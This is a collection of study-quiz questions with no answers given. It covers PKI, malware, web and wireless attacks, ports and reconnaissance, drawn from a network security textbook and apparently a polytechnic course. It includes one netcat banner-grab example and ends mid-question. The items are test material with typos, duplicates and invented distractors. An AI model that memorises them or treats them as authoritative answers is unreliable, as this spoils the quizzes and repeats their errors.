8. Digital certificates that are split into two parts are known as __________ certificates.
a. binary
b. extended
c. dual-sided
d. split

9. Which of the following is NOT a field of an X.509 certificate?
a. validity period
b. serial number
c. signature
d. CA expiration code

10. Public key infrastructure (PKI) __________.
a. protects cipherkey cryptography
b. generates public/private keys automatically
c. is the management of digital certificates
d. creates private key cryptography

11. Public-Key Cryptography Standards (PKCS) __________.
a. have been replaced by PKI
b. are widely accepted in the industry
c. define how hashing algorithms are created
d. are used to create public keys only

12. The __________ trust model supports CA.
a. direct
b. indirect
c. third party
d. remote

13. Hierarchical trust models are best suited for __________.
a. Internet usage
b. single organizations
c. settings with multiple CAs and RAs
d. organizations with fewer than 10 users

14. A(n) __________ is a published set of rules that govern the operation of a PKI.
a. Certificate Practice Statement (CPS)
b. Signature Resource Guide (SRG)
c. Enforcement Certificate
d. certificate policy (CP)

15. Each of the following is a part of the certificate life cycle except __________.
a. Creation
b. Revocation
c. Authorization
d. Expiration

16. Keys can be stored in each of the following except __________.
a. embedded in digital certificates
b. stored on the user’s local system
c. in tokens
d. in hashes

17. __________ refers to a situation in which keys are managed by a third-party, such as a
trusted CA.
a. Key escrow
b. Trusted key authority
c. Key authorization
d. Remote key administration

18. A cryptographic transport protocol for FTP is __________.
a. RAS-256
b. MIME
c. UNIX Remote Shell Encryption (UNIX-RSE)
d. Secure Sockets Layer (SSL)

19. What is the cryptographic transport protocol that is used most often to secure Web
transactions?
a. HTTPS
b. SHTTP
c. PPPTPoE
d. MD-17

20. Which is the most secure VPN cryptographic transport protocol?
a. LPTP2
b. PTP
c. IPsec
d. Hash-32


Security Guide Network Security Fumdamentals

Chapter 1 Additional 20 questions


1. Which most attacks take advantage of vulnerabilities that someone has already uncovered, a(n)
____ occurs when an attacker discovers and exploits a previously unknown flaw.
a. a zero day
b. identity theft
c. phishing
d. scam

2. In a ____ attack, attackers can attackers use hundreds or thousands of computers in an attack against a single computer or network.

a. centered
b. local
c. remote
d. distributed

3. _____ ensures that only authorized parties can view information.

a. Security
b. Availability
c. Integrity
d. Confidentiality

4. _____ ensures that information is correct and that no unauthorized person or malicious software has altered that data.

a. Availability
b. Confidentiality
c. Integrity
d. Identity

5. In information security, a loss can be _____.

a. theft of information
b. a delay in transmitting information the results in a financial penalty
c. the loss of good will or a reputation
d. all of the above

6. In information security, a threat agent can be defined as _____.


a. a force of nature such as a tornado that could destory comuputer equipment
b. a virus that attacks a computer network
c. an unsecured computer network
d. both a and b

7. Business ____ theft involves stealing proprietary business information such as research for a new drug or a list of customers that competitors are eager to acquire.


a. identity
b. data
c. plan
d. record

8. According to the 2007 FBI Computer Crime and Security Survey, the loss due to the theft of confidential data for 494 respondents was approximately ____.


a. $1 million
b. $10 million
c. $50 million
d. $100 million

9. ____ involves using someone’s personal information, such as social security numbers, to establish bank or credit card accounts that are then left unpaid, leaving the victim with the debts and ruining their credit rating.


a. Cyber terrorism
b. Identity theft
c. Phishing
d. Scam

10. Under the _____ , healthcare enterprises must guard protected health information and implement policies and procedures to safeguard it, whether it be in paper or electronic format.


a. HIPAA
b. HLPDA
c. HCPA
d. USHIPA

11. What is the maximum fine for those who wrongfully disclose individually identifiable health information with the intent to sell it?


a. $100,000
b. $250,000
c. $500,000
d. $1,000,000


12. The _____ act is designed to broaden the surveillance of law enforcement agencies so they can detect and suppress terrorism.


a. Gramm-Leach-Bliley
b. Sarbanes-Oxley
c. California Database Security Breach
d. USA Patriot



13. COPPA requires operators of online services or Web sites designed for children under the age of _____ to obtain parental consent prior to the collection, use, disclosure, or display of a child’s personal information.

a. 8
b. 10
c. 13
d. 16

14. In a company of 500 employees, it is estimated that _____ employees would be required to combat a virus attack.

a. two
b. five
c. seven
d. ten

15. The single most expensive malicious attack was the 2000 ____, which cost an estimated $8.7 billion.


a. Nimda
b. Slammer
c. Love Bug
d. Code Red

16. What is another name for unsolicited e-mail messages?

a. spam
b. spawn
c. trash
d. scam

17. According to the research group Postini, over ____ of daily e-mail messages are unsolicited and could be carrying a malicious payload.

a. one-third
b. two-thirds
c. three-fourths
d. four-fifths

18. ____ are a loose-knit network of attackers, identity thieves, and financial fraudsters.

a. Cyber criminals
b. Cyber terrorists
c. Computer spies
d. Hackers

19. Targeted attacks against financial networks, unauthorized access to information, and the theft of personal information is sometimes known as ____.

a. spam
b. phishing
c. cyber crime
d. cyber terrorism

20. A security ____ focuses on the administration and management of plans, policies, and people.


a. manager
b. engineer
c. auditor
d. inspector

Chapter 2 Additional 20 questions

1. Flash memory is a type of ____, nonvolatile computer memory that can be electrically erased and rewritten repeatedly.

a. EROM
b. ROM
c. EEPROM
d. RAM

2. ____ involves horizontally separating words, although it is still readable by the human eye.


a. Word splitting
b. GIF layering
c. Geometric variance
d. Layer variance

3. ____ is an image spam that is divided into multiple images.


a. Word splitting
b. Geometric variance
c. Layer variance
d. GIF layering

4. A ____ is a computer program or a part of a program that lies dormant until it is triggered by a specific logical event.

a. Trojan
b. logic bomb
c. macro virus
d. metamorphic virus

5. ____ is a software program that delivers advertising content in a manner that is unexpected and unwanted by the user.

a. Adware
b. Keylogger
c. Spam
d. Trojan

6. One type of virtualization in which an entire operating system environment is simulated is known as ____ virtualization.

a. NOS

b. guest

c. operating system

d. host

7. A ____ virus can interrupt almost any function executed by the computer operating system and alter it for its own malicious purposes.

a. companion

b. file infected

c. resident

d. boot

8. With operating system virtualization, a virtual machine is simulated as a self-contained software environment by the ____ system (the native operating system to the hardware).

a. guest 

b. host

c. root

d. server

9. ____ are portable communication devices that function in a manner that is unlike wired telephones.

a. A USB devices

b. NAS devices

c. Cell phones

d. SAN

10. Today’s computer systems have a(n) ____ chip in which the contents can be rewritten to provide new functionality.

a. ROM

b. RAM

c. EROM

d. PROM

11. A ____ virus infects the Master Boot Record of a hard disk drive.

a. file infector

b. companion

c. resident

d. boot

12.____ is a means of managing and presenting computer resources by function without regard to their physical layout or location.

a. Expansion

b. Virtualization

c. Load balancing

d. Distribution

13. ____ technology enables a virtual machine to be moved to a different physical computer with no impact to the users.

a. Live migration

b. Load balancing

c. Operating system virtualization

d. Server virtualization

14. A ____ is a single, dedicated hard disk-based file storage device that provides centralized and consolidated disk storage available to LAN users through a standard network connection.

a.  NAS

b. NSA

c. NSF

d. NFS

15. A computer ____ is a program that secretly attaches itself to a legitimate “carrier,” such as a document or program, and then executes when that document is opened or program is launched.

a. virus

b. worm

c. adware

d. spyware

16. In order to avoid detection some viruses can alter how they appear. These are known as ____ viruses.

a. macro

b. metamorphic

c. boot

d. companion

17.A ____ is a program advertised as performing one activity but actually does something else.

a. script

b. virus

c. Trojan

d. worm

18. The ____ is the link between the cellular network and the wired telephone world and controls all transmitters and base stations in the cellular network.

a. SAN

b. NAS

c. RF cell

d. MTSO

19. ____ uses “speckling” and different colors so that no two spam e-mails appear to be the same.

a. GIF layering

b. Geometric variance

c. Word splitting

d. Layer variance

20.Creating and managing multiple server operating systems is known as ____ virtualization.

a. operating system

b. host

c. guest

d. server

Chapter 3 Additional 20 questions

1.A(n) ____ is a small Web browser window that appears over the Web site that is being viewed.

a. swarm

b. torrent

c. popup

d. applet

2. ____, also called add-ons, represent a specific way of implementing ActiveX and are sometimes called ActiveX applications.

a. Applets

b. ActiveX controls

c. Scripts

d. Beans

3.____ hinges on an attacker being able to enter an SQL database query into a dynamic Web page.

a. XSS

b. SQL injection

c. Script injection

d. Sandboxing

4. BitTorrent maximizes the transfer speed by gathering pieces of the file and downloading these pieces simultaneously from users who already have them (the collective pieces are called a ____).

a. leech

b. swarm

c. seed

d. track

5.____ is a Windows Vista and Windows XP Service Pack 2 (SP2) feature that prevents attackers from using buffer overflow to execute malware.

a. DEP

b. NX

c. ASLR

d. ASDEP

6. ____ is a process of ensuring that any inputs are “clean” and will not corrupt the system.

a. Cross-site scripting

b. SQL injection

c. Script injection

d. Input validation

7.____ is real-time communication between two or more users.

a. SMTP

b. SMTP open relay

c. ActiveX

d. Instant messaging (IM)

8. SMTP servers can forward e-mail sent from an e-mail client to a remote domain. This is known as ____.

a. SMTP relay

b. IMAP

c. Spam

d. Spam relay

9. Instead of the Web server asking the user for the same information each time she visits that site, the server can store that user-specific information in a file on the user’s local computer and then retrieve it later. This file is called a(n) ____.

a. cookie

b. bug

c. ActiveX control

d. script

10.In a P2P network, a ____ is a server program operated by the person or organization that wants to share the file.

a. torrent

b. seed

c. leecher

d. tracker

11.The goal of ____ is to make it harder to predict where the operating system functionality resides in memory.

a. DEP

b. ASLR

c. NX

d. ASNX

12. A(n) ____ is a computer programming language that is typically interpreted into a language the computer can understand.

a. ActiveX control

b. cookie

c. shell

d. scripting language

13.Regarding e-mail, ____ handles outgoing mail.

a. SMTP

b. POP3

c. IMAP

d. SNMP

14.A ____ is a cumulative package of all security updates plus additional features.

a. service patch

b. hotfix

c. service pack

d. security patch

15. Regarding e-mail, ____ is responsible for incoming mail.

a. SMTP

b. IMAP

c. POP3

d. SNMP

16.If SMTP relay is not controlled, an attacker can use it to forward thousands of spam e-mail messages. An uncontrolled SMTP relay is known as a(n)

a. IMAP open relay

b. SMTP open relay

c. open POP

d. open IMAP

17.The ____ are the operating system settings that impose how the policy will be enforced.

a. security policies

b. group policies

c. security templates

d. configuration baselines

18.____ typically involves using client-side scripts written in JavaScript that are designed to extract information from the victim and then pass the information to the attacker.

a. Spam

b. SQL injection

c. Cross site scripting (XSS)

d. SQL scripting

19. ____ are active Internet connections that download a specific file that is available through a tracker.

a. Torrents

b. Applets

c. ActiveX controls

d. Scripts

20.____ is a language used to view and manipulate data that is stored in a relational database.

a. CSS

b. XSS

c. SQL

d. DEP

Chapter 4 Additional 20 questions

1. Wireless location mapping is the formal expression for ____.

a. wireless scanning

b.wireless caching

c. war driving

d. wireless beaconing

2.The most common type of antenna for war driving is an omnidirectional antenna, also known as a ____ antenna.

a. bipole
b.dipole
c. GPS
d. tagging

3. Each wireless device looks for beacon frames in a process known as ____.

a. mapping
b. scanning
c. caching
d. beaconing

4. One approach to substituting a fraudulent IP address is to target the external DNS server and is called ____.

a. DNS spoofing
b. DNS transfer
c. zone transfer
d. DNS poisoning

5.In order for a host using TCP/IP on an Ethernet network to find the MAC address of another device, it uses ____.
a. BIND
b. MAC-DNS
c. ARP
d. DNS

6.____ enables the attacker’s computer to forward any network traffic it receives from Computer A to the actual router.
a. IP mirroring
b. Port mirroring
c. IP forwarding
d. Port forwarding

7.When TCP/IP was developed, the host table concept was expanded to a hierarchical name system known as the ____.
a. ARPAnet
b. DNS
c. SNMP
d. SMTP

8. A group of piconets in which connections exist between different piconets is called a ____.
a. shortnet
b. meshnet
c. multinet
d. scatternet

9. With wireless CSMA/CA, the amount of time that a device must wait after the medium is clear is called the ____.
a. collision time
b. slot time
c. clear time
d. tx time

10. ____ is the name given to a wireless technology that uses short-range RF transmissions.
a. Bluetooth
b. Piconet
c. Scatternet
d. Wi-fi

11.A(n) ____ is an account that is secretly set up without the administrator’s knowledge or permission, that cannot be easily detected, and that allows for remote access to the device.
a. escalation account
b.weak password
c. back door
d. default account

12.____ allows the administrator to configure a switch to redirect traffic that occurs on some or all ports to a designated monitoring port on the switch.

a. Sniffering
b. Protocol analyzer
c. NIC mirroring
d. Port mirroring

13. DNS poisoning can be prevented by using the latest editions of the DNS software, ____.
a. BIND
b. DNSS
c. IPsec
d. BINDSEC

14.The most common protocol suite used today for networks as well as the Internet is ____.
a. TCP/IP
b. SMTP
c. SNMP
d. DNS

15.____ specifies that before a networked device starts to send, it should first listen (called carrier sensing) to see if any other device is transmitting.
a. CSMA/ACK
b. CSMA/CA
c. CSMA/CD
d. CSCD/MA

16.____ is a popular protocol used to manage network equipment.
a. SMTP
b. IMAP
c. TCP/IP
d. SNMP

17. A(n) ____ attack makes a copy of the transmission before sending it to the recipient.
a. man-in-the-middle
b. replay
c. DNS spoofing
d. ARP posioning

18.In a “____ attack,” a TCP/IP ping request is sent to all computers on the network, which makes it appear that a server is asking for a response.
a. smurf
b. ping of death
c. frame
d. DNS poisoning

19.An attacker could alter the MAC address in the ARP cache so that the corresponding IP address would point to a different computer, which is known as ____.
a. DNS spoofing
b. DNS posioning
c. ARP transfer
d. ARP posioning

20. At regular intervals a wireless AP sends a beacon frame to announce its presence and to provide the necessary information for devices that want to join the network. This process is known as ____.
a. beaconing
b. scanning
c. mapping
d. caching

Chapter 5 Additional 20 questions

1. The goal of ____ is to prevent computers with sub-optimal security from potentially infecting other computers through the network.

a. subnetting

b. NAT

c. NAC

d. PAT

2.____ honeypots are used mainly by organizations to capture limited information regarding attacks on that organization’s honeypot.

a. Research
b. Production
c. Clustered
d. Virtual

3. ____ are designed to inspect traffic, and based on their configuration or security policy, they can drop malicious traffic.

a. NIDS

b. HIPS

c. NIPS

d. HIDS

4. ____ switches are connected directly to the devices on the network.

a. Workgroup

b. Core

c. Stateless

d. Stateful

5.____ packet filtering keeps a record of the state of a connection between an internal computer and an external server and then makes decisions based on the connection as well as the rule base.

a. Stateless

b. Stateful

c. Classful

d. Classless

6. A ____ watches for attempts to penetrate a network.

a. SIDS

b. HIDS

c. NIDS

d. PIDS

7.A ____ is an instruction that interrupts the program being executed and requests a service from the operating system.

a. system call

b. system command

c. kernel call

d. system module

8. ____ can fully decode application-layer network protocols. Once these protocols are decoded, the different parts of the protocol can be analyzed for any suspicious behavior.

a. Proxy servers

b. Protocol analyzers

c. Firewalls

d. HIDS

9. ____ work to protect the entire network and all devices that are connected to it.

a. HIPS

b. HIDS

c. Revers proxy

d. NIPS

10. A software-based ____ attempt to monitor and possibly prevent attempts to attack a local system.

a. HIDS

b. NIDS

c. SIDS

d. PIDS

11. ____ examines the current state of a system or network device before it is allowed to connect to the network.

a. NAT

b. PAT

c. VAC

d. NAC

12. The goal of a ____ is to hide the IP address of client systems inside the secure network.

a. VLAN

b. switch

c. router

d. proxy server

13. ____ honeypots are used mainly by organizations to capture limited information regarding attacks on that organization’s honeypot.

a. Virtual

b. Research

c. Production

d. Clustered

14. A(n) ____ attempts to identify inappropriate activity.

a. reverse proxy

b. IDS

c. firewall

d. proxy server

15. ____ IP addresses are not assigned to any specific user or organization; instead, they can be used by any user on the private internal network.

a. Public

b. Virtual

c. DMZ

d. Private

16. A variation of NAT is ____. Instead of giving each outgoing packet a different IP address, each packet is given the same IP address but a different TCP port number.

a. PAT

b. CAT

c. DAT

d. TAT

17. A(n) ____ finds malicious traffic and deals with it immediately.

a. IDS

b. HIDS

c. NIDS

d. IPS

18. Using ____, networks can essentially be divided into three parts: network, subnet, and host.

a. classful addressing

b. subnetting

c. stateful addressing

d. stateless addressing

19. A ____ is a computer typically located in a DMZ that is loaded with software and data files that appear to be authentic, yet they are actually imitations of real data files.

a. proxy server

b. honeypot

c. reverse proxy

d. HIDS

20. ____ are subdivisions of IP address class (Class A, B, or C) networks and allow a single Class A, B, or C network to be used instead of multiple networks.

a. Workgroup

b. VLANs

c. Subnets

d. Domains

Chapter 6 Additional 20 questions

1. IEEE 802.11i authentication and key management is accomplished by the IEEE ____ standard.
a. 802.11a
b. 802.11n
c. 802.1x
d. 802.3i

2. This IEEE ____ standard specifies a maximum rated speed of 54 Mbps using the 5 GHz spectrum.

a. 802.11a

b. 802.11b

c. 802.11c

d. 802.11d

3. At regular intervals a wireless AP sends a beacon frame to announce its presence and to provide the necessary information for devices that want to join the network. This process is known as ____.

a. broadcasting

b. beaconing

c. roaming

d. association
  

4. In 2002, the WECA organization changed its name to ____.

a. Wi-Fi Alliance

b. WECA Alliance

c. WTiG

d. iWITG

5. With ____ scanning, a wireless device simply listens for a beacon frame for a set period of time.

a. active

b. broadcast

c. reactive

d. passive

6. Access points have a setting called “____,” which is what the PSK uses as a seed value to generate new keys.

a. Group Key Renewal

b. Interseed

c. PSK-seed

d. PSK-IV

7. WPA also replaces the cyclic redundancy check (CRC) function in WEP with the ____.

a. TKIP

b. MIC

c. PSK

d. MD5

8. Encryption under the WPA2 personal security model is accomplished by ____.

a. DES-CCMP

b. AES-CCMP

c. 3DES

d. RC5

9. ____ was designed to ensure that only authorized parties can view transmitted wireless information.

a. WECA

b. MAC

c. WEP

d. 802.11g

10. ____ authentication is based upon the fact that only pre-approved wireless devices are given the shared key.

a. Open key

b. Open system

c. Shared system

d. Shared key

11. WPA replaces WEP with an encryption technology called ____.

a. GKR

b, PSK

c. TKIP

d. RC5

12. A(n) ____ frame carries information about the data rates that the device can support along with the Service Set Identifier (SSID) of the network it wants to join.

a. open authentication

b. device request

c. association request

d. roaming

13. The plaintext to be transmitted has a cyclic redundancy check (CRC) value calculated, which is a checksum based on the contents of the text. WEP calls this the ____ and appends it to the end of the text.

a. integrity check value (ICV)

b. keystream

c. initialization vector (IV)

d. pre-pened IV

14. In the early 1980s, the IEEE began work on developing computer network architecture standards. This work was called ____, and it quickly expanded into several different categories of network technology.

a. Project 100

b. Project 302

c. Project 513

d. Project 802

15. In order to address growing wireless security concerns, in October 2003 the Wi-Fi Alliance introduced ____.

a. RC5

b. WEP2

c. AES

d. WPA

16. ____ is intended for personal and small office home office users who do not have advanced server capabilities.

a. PSK

b. AES

c. CCMP

d. CBC-MAC

17. The PRNG in WEP is based on the ____ cipher algorithm.

a. RC2

b. RC4

c. DES

d. AES

18. IEEE 802.11i includes ____, which stores information from a device on the network so if a user roams away from a wireless access point and later returns, he does not need to re-enter all of the credentials.

a. pre-authentication

b. AES-CCMP

c. PSK

d. key-caching

19. WEP accomplishes confidentiality by taking unencrypted text and then encrypting or “scrambling” it into ____ so that it cannot be viewed by unauthorized parties while being transmitted.

a. plaintext

b. ciphertext

c. simpletext

d. shuffletext

20. Mobile devices constantly survey the radio frequencies at regular intervals to determine if a different AP can provide better service. If it finds one, then the device automatically attempts to associate with the new AP (this process is called ____).

a. beaconing

b. a turnoff

c. a handoff

d. scanning

Chapter 7 Additional 20 questions

To be continues..... (i m busy recently.. is all in hard copy while i need time to key in)

NETWORK VULNERABILITY & SECURITY TOOLS (ET0521)

59 questions quiz For MST Chapter 1 to Chapter 6

1.Which of the following is the best method for preventing social engineering attacks? 

a) User Education
b) Security Tokens

c) Biometric devices
d) Encryption


2.When a browser trying to contact a web server, the client OS dynamically assigns a source port value of _____.
a) less than 1024
b) greater than 80
c) greater than 1023
d) greater than 1024

3.The following are commonly used techniques for reconnaissance except ______. 

a) low-technology reconnaissance
b) web searches
c) whois database analysis
d) High performance hardware

4.An attacker with low skill level is called ______? 

a) cracker

b) hacker

c) script kiddle

d) Phreaker

5._____ is the interception of network data not intended for the machine that is intercepting the traffic.

a) Packet Sniffing

b) Packet Spoofing

c) Packet Stealing

d) Packet Engineering

6.Which of the following software is a good port scanning tool?

a) Telnet

b) Nmap

c) ipconfig

d) portscan

7.Which of the following protocols is responsible for addressing hosts in a TCP/IP –based network?

a) TCP

b) UDP

c) DHCP

d) IP

8.what does an attacker do in Reconnaissance Phase ?

i. An attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.

ii. The Core of Reconnaissance attack is intrusive information gathering techniques.

iii. System is breached or accessed in order to retrieve information.

a) I only:

b) I and ii:

c) I , ii and iii;

d) None of the above

9. In order to determine which class any IP address is in, one should examine the first ____ bits of the IP address.

a) 8bits

b) 3bits

c) 4bits

d) 5bits

10. IP addresses beginning with 127 decimal are reserved for ___________.

a) unknown class

b) reserved for loopback

c) for external testing

d) for future use

11. Which of the following statements is FALSE ?

a) TCP Packet includes two port numbers a source port and a destination port.

b) A TCP port with listening service is known as an reserved port

c) The TCP port number is a 16-bit numbers.

d) There are 65536 different TCP ports on each machines.

12. Which of the following SuperScan’s tool is used to uncover the users account list at the target machine?

a) User account Exploit

b) User Engineering

c) Windows Enumeration

d) Windows User Exploit

13.Which of the following are the basic types of hackers attack ?

i. Denial of Service Attack

ii. Repudiation Attack

iii. Access Attack

iv. Modification Attack

a) I, ii and iii;

b) I, ii and iv;

c) I, iii and iv;

d) I, ii, iii and iv;

14. The transmission control protocol/internet protocol ( TCP/IP ) protocol that handles outgoing mail using port 25 is _____.

a) Simple Mail Transfer Protocol ( SMTP )

b) Post Office Protocol (POP)

c) Internet Mail Access Protocol (IMAP)

d) Secure/Multi Purpose Internet Mail Extensions (S/MIME )

15. Which of the following troubleshooting utilities is common to all operating systems and is used for testing connectivity of two hosts on a network?

a) Tracert

b) ipconfig

c) ping

d) nslookup

16. Ethereal is a software tool used to ____ between client and server machine.

a) test the physical connection

b) test the functionality of Ethernet adaptors

c) observe the packets sent and received

d) transfer data and files

17. Sending an e-mail from one address but making it seem as if it is coming from another is called ______.

a) falsifying

b) telneting

c) exploiting

d) spoofing

18. Each of the following is an OSI Model protocol layer except ______.

a) Software

b) Transport

c) Network

d) Physical

19. The following are methods employed to uncover system vulnerabilities except ______.

a) IP Address Scanning

b) Manual Vulnerability probing

c) Traffic Monitoring

d) Vulnerability Scanning

20. Nmap is able to provide the following types of scanning except ______.

a) TCP Connect

b) TCP SYN

c) Password Scanning

d) UDP Connect

21. The objectives of port scanning are to identify the following except ______.

a) Hardware model number

b) Open ports

c) Host operating system

d) Software or service versions

22. Each machine with a TCP/IP stack has ______ TCP ports and ______ UDP ports.

a) 65536 and 65536

b) 32768 and 32768

c) 32768 and 65536

d) 65536 and 32768

23. In TCP header, there are TCP control bits, also know as the TCP flags.

a) 6

b) 7

c) 8

d) 9

24. Which of the following is the correct sequence for OSI (Open Systems Interconnection) seven layers?

a) Physical Layer, Data Link Layer, Network Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer 

b) Physical Layer, Network Layer, Data Link Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer

c) Physical Layer, Data Link Layer, Transport Layer, Network Layer, Session Layer, Presentation Layer and Application Layer

d) Physical Layer, Network Layer, Transport Layer, Data Link Layer, Session Layer, Presentation Layer and Application Layer

25. Which of the following is FALSE about User Datagram Protocol (UDP)?

a) It is connection protocol

b) Packet transmitted does not put in order

c) No packet lost retransmission

d) No acknowledgement or session tear down required

26. When a threat uses vulnerability to attack a resource, some severe consequences can result in

i. Loss of Confidentiality

ii. Loss of Integrity

iii. Loss of Availability

a) i and ii;

b) ii and iii;

c) i, ii and iii;

d) None of the above.

27. Which of the following statements are TRUE about Computer Misuse Act (Cap 50A)?

i. Any police officer may arrest without warrant any person reasonably suspected of committing an offence under this Act

ii. Any person who knowingly causes a computer to perform any function for the purpose of securing access without authority to any program or data held in any computer shall be guilty of an offence

iii. Any person who causes a computer to perform any function for the purpose of securing access to any program or data held in any computer with intent to commit an offence to which this section applies shall be guilty of an offence.

iv. Any person who does any act which he knows will cause an unauthorised modification of the contents of any computer shall be guilty of an offence

a) i, ii and iii;

b) i, ii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv.

28. Which of the following statements is FALSE about Risk Management?

a) Risk can be qualitatively defined in three levels: Low, Medium and High

b) Risk Management is about Security

c) Risk management determines the value of the resources and the level of security for it

d) Threat + Vulnerability = Risk

29. IP resides at which layer of the OSI model?

a) Application

b) Data Link

c) Network

d) Physical

30. The TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)

b) Network (Layer 3)

c) Transport (Layer 4)

d) Little interaction with Data Link ( Layer 2 )

31. When a browser surfs the Internet, which of the following is the correct order flow of data through the communication layers?
a) Network -> Data -> Physical -> Transport

b) Transport -> Data -> Physical -> Network

c) Network -> Transport -> Physical -> Data

d) Transport -> Network -> Data -> Physical

32. Which of the following are TRUE about a Script Kiddie?

i. With low-level hacking skills

ii. Use released tools and software to exploit without understanding the underlying vulnerability

iii. Biggest group of attackers and usually rather immature

iv. Use Social Engineering technique

a) i, ii and iii;

b) i, ii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv

33. Which of the following is the outcome of an Access Attack?

a) It is an attack against the confidentiality of the information

b) It is an attack against the integrity of information

c) It causes information to be unavailable

d) It is an attack against the accountability of information

34. A person who applies his hacking skills for offensive purpose is known as

a) Cracker

b) White Hat

c) Ethical Hacker

d) Phreaker

35. Which information directory protocol is the standard for file transfer over the Internet?

a) TCP

b) UDP

c) FTP

d) HTTP

36. What is the information can be gathered by an attacker by typing the following command using Netcat?

C:> nc www.sp.edu.sg 80 <press Enter>

HEAD / HTTP/1.0 <press Enter>

<press Enter>

a) Domain Name

b) Web Server version

c) Administrative Contact Number

d) Netblock Owner

37. Internet is “managed” by

a) APNIC

b) ICANN

c) AfriNIC

d) ARIN

38. The most important elements of Google’s technology are:

i. The Google bots

ii. The Google index

iii. The Google cache

iv. The Google API

a) i, ii and iii;

b) i, ii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv.

39. General types of reconnaissance data can be obtained from Internet are:

i. Employee data

ii. Business partner

iii. Existing technologies

iv. Financial information

a) i, ii and iii;

b) i, ii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv.

40. Without even touching a computer, an attacker might be able to gain very sensitive information about an organisation through

i. Social Engineering;

ii. Physical Break-in;

iii. War Dialling;

iv. Dumpster Diving.

a) i, ii and iii;

b) i, ii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv.

41. Which of the following measures can be used to defend against Network Mapping?

i. Filter out the underlying message that network mapping tools rely on by using firewalls and the packet filtering router;

ii. Block incoming ICMP message;

iii. Filter ICMP_TIME_EXCEEDED messages leaving your network to stymie an attacker using traceroute;

iv. To prevent an attacker from discovering open ports on your machine is to close all unused ports

a) i and ii;

b) ii and iii;

c) i, ii and iii;

d) i, ii, iii and iv

42. The objectives of port scanning are generally to identify one or more of the following:

i. Open ports

ii. Host operating system

iii. Software or service versions

iv. Vulnerable software versions

a) i, ii and iii;

b) i, iii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv

43. Which of the following is FALSE?

a) TCP Connect is also know as Full Open Scan;

b) TCP SYN is also know as Half Open Scan;

c) TCP SYN Port Scanning completes the three-way handshake;

d) TCP SYN Port Scanning is stealthier than TCP Connect scans

44. The exploitation of resources can be performed in many ways. Some of the more common ways are:

i. Technical Vulnerability Exploitation

ii. Denial of Service

iii. Information Gathering

iv. Social Engineering

a) i and ii;
b) i, ii and iii;
c) ii, iii and iv;
d) i, ii, iii and iv;

45. What is the name of the unique physical address that is assigned to every network interface card?

a) IP address

b) Hostname

c) MAC address

d) NetBIOS name

46. Which of the following protocols transmit sensitive information in clear text?

a) FTP and Telnet

b) FTP and TCP

c) Telnet and TCP

d) TCP and ARP

47. TCP/IP family of protocols includes several components

i. Transmission Control Protocol (TCP);

ii. User Datagram Protocol (UDP);

iii. Internet Protocol (IP);

iv. Internet Control Message Protocol (ICMP)

a) i, ii and iii;

b) i, iii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv

48. For Information Gathering Methodology under Publicly Available Information, what is the common information an attacker looks for?

i. Names

ii. Emails

iii. Technologies

iv. Current Events / Recent Happenings

a) i, ii and iii;

b) i, iii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv

49. Which of the following statement is FALSE about ICMP (Internet Control Message Protocol)?

a) ICMP was essentially designed for the troubleshooting of routing and connectivity issues in IP networks

b) ICMP “mapping” is often conducted via a ping sweep

c) ICMP manipulates the time-to-live (TTL) option in UDP packets (should be TraceRoute)

d) ICMP message types reply from the target provide a great deal of information to hackers about host connectivity and the hop count to a particular system

50. Which of the following information cannot generally be found from the target’s Internet Registrar?

a) Administrative, technical, and billing contact names

b) Customer information

c) Company’s postal addresses

d) Telephone numbers

51. Each of the following protocols can be used by TCP for transmissions over the Internet except _________.

a) Internet Transfer Protocol (ITP)

b) HyperText Transfer Protocol (HTTP)

c) File Transfer Protocol (FTP)

d) Post Office Protocol (POP)

52. Which of the following is the correct sequence of phases of hacker’s attack?

a) Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;

b) Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;

c) Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;

d) Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

53. Which of the following is NOT a defence against Physical Break-in Attack?

a) All computer users must be trained not to give sensitive information away to friendly callers

b) A guard at front door or install a card reader for facility accessing

c) Educate employees about the dangers of letting people in the building without checking their credentials

d) Use automatic password-protected screen savers

54. The premise behind reconnaissance activities is to profile the following except _________.

a) size of organisation

b) administrative staff

c) network infrastructure

d) an organisation operations

55. Which of the following statements is FALSE about the key terms used in the risk management process?

a) A Resource is anything in an environment that trying to protect

b) A Threat is a resouce can be accessed by making use of a vulnerability in your environment

c) A Vulnerable is a point where a resource is susceptible to attack

d) Countermeasures are deployed to counteract threats and vulnerabilities, therefore reducing the risk in your environment

56. Which of the following is not a well known TCP port number?
a) 8888

b) 53

c) 80

d) 25

57. Which of the following Hacker Class is also known as “Cracker”?
a) Grey Hats

b) Red Hats

c) Black Hats

d) White Hats

58. Which of the following NOT common activity for Scanning?
a) War Dialling

b) Network Mapping

c) Port Scanning

d) Dumpster Diving

59. Internet search engines are used by attacker because they provide the following facilities except ________.

a) Internet directories

b) Link crawlers

c) Caches

d) Hyperlinks



*Overall there are 75 Quiz (most of the quiz is not here are from chapter 5 & 6) Known all port number as well
PORT 21 FTP PORT 23 Telnet
PORT 25 SMTP
PORT 53 DNS/Domain
PORT 80 HTTP/Web



255 questions quiz For Final Exam Topic 1 to Topic 11

1 .Which of the followings are TRUE about Smurf Attack?
i. Smurf attack also known as directed broadcast attack
ii. Smurf attacks rely on a directed broadcast to create a flood of traffic for a victim
iii. A perpetrator sends a large amount of ICMP echo (ping) traffic at IP broadcast addresses, all of it having a spoofed source address of a victim


a) i and ii;
b) i and iii;
c) ii and iii;
d) i, ii and iii.

2. The purpose of port scanning is systematically scan for range of ____.
a) opened ports at the target system.
b) closed ports at the target system.
c) protected ports at the target system.
d) active ports that are running application services at the target system.

3. What is hybrid password cracking?
a) crack password by guessing every possible combination of characters.
b) crack password based on dictionary form.
